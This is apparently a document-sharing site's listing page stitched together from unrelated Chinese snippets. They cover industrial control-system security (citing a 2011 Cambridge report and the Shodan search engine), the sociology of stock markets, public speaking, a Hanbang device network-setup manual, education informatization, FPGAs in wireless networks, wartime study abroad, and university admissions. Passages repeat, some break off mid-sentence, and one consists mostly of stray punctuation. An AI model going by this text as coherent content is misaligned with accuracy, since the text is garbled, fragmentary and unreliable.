( 数 据 来 源 :2011 年 剑 桥 大 学 ) 上 面 这 两 张 图 片 来 自 剑 桥 大 学 2011 年 提 供 的 一 个 分 析 报 告, 通 过 这 个 报 告 我 们 可 以 看 出, 只 要 通 过 网 络 搜 索 引 擎 (Shodan 搜 索 引 擎 ) 进 行 简 单

( 数 据 来 源 :2011 年 剑 桥 大 学 ) 上 面 这 两 张 图 片 来 自 剑 桥 大 学 2011 年 提 供 的 一 个 分 析 报 告, 通 过 这 个 报 告 我 们 可 以 看 出, 只 要 通 过 网 络 搜 索 引 擎 (Shodan 搜 索 引 擎 ) 进 行 简 单 智 能 制 造 与 工 业 4.0 时 代 的 信 息 安 全 菲 尼 克 斯 电 气 mguard 为 控 制 系 统 保 驾 护 航 随 着 智 能 制 造 与 工 业 4.0 战 略 的 提 出, 工 业 生 产 的 数 字 化 成 为 一 种 不 可 阻 挡 的 未 来 趋 势, 高 度 融 合 IT 技 术 的 工 业 自 动 化 将 会 得 到 迅 速 而 广 泛 的 应 用, 对 于

More information

.,,.,.,,, /, (, ), : ( ) ( ) (, ;, ; &, ;, ;, ), ( ),,,,,,,,??,,, ( ) ( ),,,,,,,, ( ),,,, ( ),,,

.,,.,.,,, /, (, ), : ( ) ( ) (, ;, ; &, ;, ;, ), ( ),,,,,,,,??,,, ( ) ( ),,,,,,,, ( ),,,, ( ),,, 周长城殷燕敏 内容提要 : 本文用社会学的视野审视了日常生活中日显重要而往往被社会学家 所忽略的金融市场, 尤其是证券市场 主要运用大众行为理论 感染理论 价值增加理论 收敛理论 认知失调理论 社会比较理论等社会理论来研究证券市场, 同时考察 了几种情景因素与市场行为的关系以及时髦对证券市场的影响等,,,,,,, (,.) (, ) ( ),,,,, ( ),, ; :. ;.,,, (,..) (,

More information

Microsoft Word - fy.doc

Microsoft Word - fy.doc 爱默生 Emerson 说过 自信是成功的第一秘诀 自信既不是孤芳自赏 得意忘形 也不是自以为是和盲目乐观 而是激励自我奋发进取的一种心理素质 是以高昂的斗志 充沛的精力迎接挑战的一种乐观情绪 演讲者能够建立起强大的气场 正是源于内心强烈的自信 演讲给许多人留下的印象往往不是巨大的精神享受, 而是惶恐和错乱 虽然在演讲中, 任何人对下一秒将要发生的事情都无从得知, 但恐惧并不会帮助我们做好准备,

More information

目 录 汉 邦 高 科 介 绍 局 域 网 设 置 广 域 网 设 置 网 络 访 问 常 见 问 题 销 售 服 务 网 络 2

目 录 汉 邦 高 科 介 绍 局 域 网 设 置 广 域 网 设 置 网 络 访 问 常 见 问 题 销 售 服 务 网 络 2 易 家 电 子 整 理 发 布 汉 邦 高 科 技 术 系 列 文 档 嵌 入 式 产 品 网 络 设 置 方 法 编 号 : 2009001-V10 北 京 汉 邦 高 科 数 字 技 术 有 限 公 司 版 权 所 有 2009 年 12 月 1 目 录 汉 邦 高 科 介 绍 局 域 网 设 置 广 域 网 设 置 网 络 访 问 常 见 问 题 销 售 服 务 网 络 2 一 公 司 简 介

More information

大数据与智慧教育

大数据与智慧教育 区 域 教 育 信 息 化 规 划 与 智 慧 校 园 建 设 柯 清 超 www.u-learning.cn keqingchao@126.com 华 南 师 范 大 学 教 育 技 术 研 究 所 2014.06 要 点 1 教 育 信 息 化 的 发 展 路 径 2 从 教 育 信 息 化 到 智 慧 教 育 3 区 域 信 息 化 规 划 与 设 计 4 智 慧 校 园 建 设 与 应 用

More information

FPGAs in Next Generation Wireless Networks WPChinese

FPGAs in Next Generation Wireless Networks WPChinese FPGA 2010 3 Lattice Semiconductor 5555 Northeast Moore Ct. Hillsboro, Oregon 97124 USA Telephone: (503) 268-8000 www.latticesemi.com 1 FPGAs in Next Generation Wireless Networks GSM GSM-EDGE 384kbps CDMA2000

More information

抗战时期的中国留学教育!!!! #!! # %

抗战时期的中国留学教育!!!! #!! # % 孔繁岭 七七事变后 主要激于爱国义愤 欧美留学生的近半 关内留学生的几乎全部 毅然回国 投入抗战洪流之中 在教育 科技 文化等战线发挥了积极作用 另有 名左右滞留海外 战时 鉴于外汇的紧缺和战后的需要 国民政府留学政策经历了前严后松的变化 约有 名学子被派赴海外 主要前往美英 与此同时 沦陷区各伪政权积极推行留日奴化教育 连同台湾 约有 万人前往敌国 整个抗战时期 这两万余名在海外的学子 情况各异

More information

考试研究 % 第 卷第 期 # # # # #

考试研究 % 第 卷第 期 # # # # # 张亚群! 北京大学 清华大学自主招生是在高考基础上进行自主选拔 综合评价 降分录取的招生模式 它适应了建设一流大学和培养创新人才的要求 为全面发展或具有特长的考生提供了更多的入学选择机会 两校自主选拔竞争激烈 招生范围逐年扩大 取得了一定的成效 但也存在操作复杂 成本高 忽视弱势阶层考生 特长生优势不显著等不足 需要进一步改革与完善其选拔机制! 北京大学清华大学自主招生考试!!! 张亚群 教授 博士生导师

More information